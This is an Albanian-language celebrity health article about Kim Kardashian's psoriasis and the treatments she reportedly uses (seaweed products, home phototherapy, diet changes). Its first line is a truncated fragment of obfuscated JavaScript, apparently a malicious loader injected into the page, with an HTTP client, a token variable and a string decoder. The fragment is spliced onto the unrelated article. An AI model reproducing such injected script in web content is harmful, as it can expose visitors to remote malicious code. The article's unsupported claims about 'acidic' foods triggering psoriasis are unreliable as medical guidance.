;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ja nga cila sëmundje vuan Kim Kardashian dhe si po e trajton

By

Nëse jeni ndër miliona ndjekësit e Kim Kardashian në Instagram, e dini se ajo së fundmi është duke vuajtur ndjezje të psoriazës, sëmundje kjo nga e cila vuan influencuesja amerikane. Kjo sëmundje autoimune e lëkurës është mjaft e shpeshtë në SHBA, e cila prek rreth 8 milionë amerikanë – edhe pse mjekët nuk kanë gjetur ende kurë, fatmirësisht ka mënyra se si të trajtohet.

Kimi e bëri publike sëmundjen e saj së pari në vitin 2011, dhe nga atëherë ajo ka postuar në rrjete sociale, mënyra se si po e trajton këtë sëmundje që ta mbajë nën kontroll.

Produkte me alga deti

Në vitin 2017 ajo ndau me ndjekësit  saj një tretman të suksesshëm me produkte që kanë bazë algat  detit. Algat e detit, çuditërisht kanë shumë benefite për lëkurën, sepse kanë tipare anti-plakje, anti-inflamatore dhe janë ultra hidratuese.

Trajtime me dritë

Një tretman tjetër që funksionoi për Kim është edhe trajtimi me dritë. Në fund të vitit 2017, ajo ndau në Instagram që psoriaza e saj gati se ishte zhdukur, pasi që provoi terapi me sistem drite, në shtëpi. Fototerapia është shumë e mirë për psoriazën, pasi që drita depërton në lëkurë dhe ngadalëson rritjen e qelizave të cilat janë të prekura nga sëmundja.

Eliminimi i ushqimeve acidike

Kim, ka folur hapur gjithnjë për dieta të cilat nuk përmbajnë ushqime acidike, sepse ushqimet që ndezin sëmundjen janë qumështi, frutat me citrus, luteni dhe ushqimet e yndyrshme.

Image result for kim kardashian psoriasis

 

Artikuj të ngjashëm